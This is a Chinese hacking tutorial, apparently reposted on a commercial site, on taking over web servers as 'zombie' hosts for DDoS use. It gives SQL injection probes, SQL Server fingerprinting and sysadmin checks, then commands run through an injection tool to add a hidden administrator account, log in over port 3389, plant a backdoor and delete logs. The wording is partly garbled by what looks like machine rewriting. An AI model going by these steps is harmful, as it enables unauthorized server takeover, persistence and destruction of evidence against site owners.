捕捉肉鸡 循序渐进 (捕捉肉鸡循序怎么写)

次浏览

摘要:即使捕捉了菜鸟的肉鸡,品质也往往比拟差,最多也可以做DDoS肉鸡,笔者倡导,假设用来学习操作或许钻研,还是捕捉主机肉鸡比拟好,由于它稳固、24小时在线、速度快……好处不计其数,上方笔者就带大家对一个站点启动测试,本文旨在抛砖引玉,宿愿与大家启动技术交

即使捕捉了菜鸟的肉鸡,品质也往往比拟差,最多也可以做DDoS肉鸡。笔者倡导,假设用来学习操作或许钻研,还是捕捉主机肉鸡比拟好,由于它稳固、24小时在线、速度快……好处不计其数。上方笔者就带大家对一个站点启动测试。本文旨在抛砖引玉,宿愿与大家启动技术交换。1.例如为咱们要测试的中央(为了不用要的费事,地址用xxx来替代)。检测注入破绽是在网址后输入“AND 1=1”反常页面或“AND 1=2”不反常页面。发现破绽的环节我想大家都知道,这里就不多说了。2.接着咱们来判别数据库的类型。在地址前面输入:and (select count(*) from sysobjects)>0 也就是:and (select count(*) from sysobjects)>0。3.从图1中可以看到页面反常前往!接着在地址上输入:and (select count(*) from msysobjects)>0。咱们来看一下前往的状况,如图2所示。

4.这样,咱们可以判别,该数据库是SQL Server。上方,在地址前面输入这条命令:and 1=(SELECT%20IS_SRVROLEMEMBER('sysadmin'))。wWw.itcOmpUTEr.cOM.cN5.这是判别读写权限,页面反常前往,如图3所示。晕,居然是SA权限。拿出NB 联盟注入工具来测试吧。操作比输入代码要便捷,也比拟易懂。

6.在注上天址里填上要注入的地址,在上方的DOS 命令中输入“net user”查问账户(图4)。

7.接着,输入“net user hsmw hsmw / add”参与 一个名字为 “hsmw”的账号(图5),再输入“net localgroup administrators hsmw /add”把刚刚参与的hsmw 这个账号(图6),优化为治理员权限。

8.来看参与的成果。输入“net user”,咱们可以看到,多了一个 hsmw的 账号。这说明参与账号完成了(图7)。

9.再启动便捷的扫描,看看开了3389端口没有。太“可怜”了,居然开了3389。哈哈,间接用咱们刚刚参与的账号登录,而后留后门并删除日志。撤!

From:
随机内容
版权声明 1、本网站名称:青白江咚波电子商务网
2、本站永久网址:http://www.zcxhd.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报

-->